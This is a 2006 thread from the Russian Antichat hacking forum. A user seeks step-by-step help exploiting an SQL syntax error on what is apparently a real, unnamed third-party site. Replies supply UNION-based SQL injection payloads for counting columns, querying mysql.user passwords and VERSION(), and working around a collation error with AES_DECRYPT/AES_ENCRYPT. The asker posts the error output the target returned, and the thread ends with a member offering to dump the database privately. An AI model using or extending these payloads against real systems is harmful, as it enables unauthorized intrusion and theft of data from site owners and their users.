Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.10.2006, 17:10
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Error sql
Ситуация такая...
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Не раз сталкивался с подобными ошибками...
Расплывчато представляю то, как использовать подобную ошибку...
Не могли бы Вы рассказать...что да как...
И если можно с примером... |
|
|
21.10.2006, 18:27
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453
Репутация:
354
|
|
Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!
|
|
|
|
21.10.2006, 18:54
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Попробуй без кавычки, потом попробуй например id=(или чё там) несуществующее 777777777777
|
|
|
|
21.10.2006, 21:32
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Сообщение от ~Real F@ck!~
Скуль конкретный! Дай ссылку баги... я что нить попробую.!.!.!.!
Ссори, ссылку дать никак не могу...
Проект очень и очень серьезный, не хотелось бы, чтоб его напрочь снесли...В общем светить ссылку ну никак не могу...
to Azazel
Что-то вроде 77777777 вводил...выводил, что мол запись просто не найдена...
Данная ошибка, которую я описал в первом посте как я понял реагирует только тогда, когда id='
Ничего другого, именно '...
Вводил все что можно...
Какие еще будут предложения?
Последний раз редактировалось Koller; 21.10.2006 в 21:51..
|
|
|
|
21.10.2006, 22:00
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
id=9999999+union+select+null,null,null/*
id=9999999+union+select+1,2,3/*
Подбираешь цифры пока не ищезнет сообщение
The used SELECT statements have a different number of columns
Потом можно будет доставать данные с базы
И вобще прежде чем задавать такие вопросы юзай поиск по сайту! Про sql-injection написано достаточно...
|
|
|
|
21.10.2006, 23:04
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Я всегда прежде чем задавать какие-то там либо вопросы обращаюсь к поиску...
Да, по поводу sql-injection написано даже придостачно...согласен...
Далеко не все понимал, когда читал например статью отсюда - _http://forum.antichat.ru/thread19844.html
Посему решил на реальном примере разобраться...прошу зла на меня держать, ежели посчитаете эту тему вовсе нубской 
Подобрал цифры...сообщение исчезло...
Каким образом можно достать данные с базы? Мне ведь как я понимаю нужно знать названия столбцов...как делать, не знаю...
Прошу помочь...
id='+union+select+1,2,3,4,5,6,7/*
|
|
|
|
21.10.2006, 23:51
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Постепенно начинаю понимать:
при запросе id='+union+select+1,2,3,4,5,6,7+from+users/* выдает - Table 'cj**.users' doesn't exist
при запросе id='+union+select+1,2,3,4,5,6,7,mysql.user.passwor d,null+from+mysql.user/* - Access denied for user 'pank***'@'217.23.133.***' to database 'mysql'
про запросе id='+union+select+null,null,null,null,VERSION(),nu ll,null/* выдает - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Что мне это все дает?
И как правильно составить все-таки запрос?
Последний раз редактировалось Koller; 22.10.2006 в 00:37..
|
|
|
|
23.10.2006, 11:49
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
id='+union+select+null,null,null,null,AES_DECRYPT( AES_ENCRYPT(USER(),0x71),0x71),null,null/
Кодирова не та просто.
|
|
|
|
23.10.2006, 12:50
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
Ввел так, ничего нового не узнал - 01.01.1970 pank***@217.23.133.***
Каким образом можно попытаться достать нужную мне информацию из БД?
|
|
|
|
23.10.2006, 12:54
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Стукни в асю могу снять базу.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
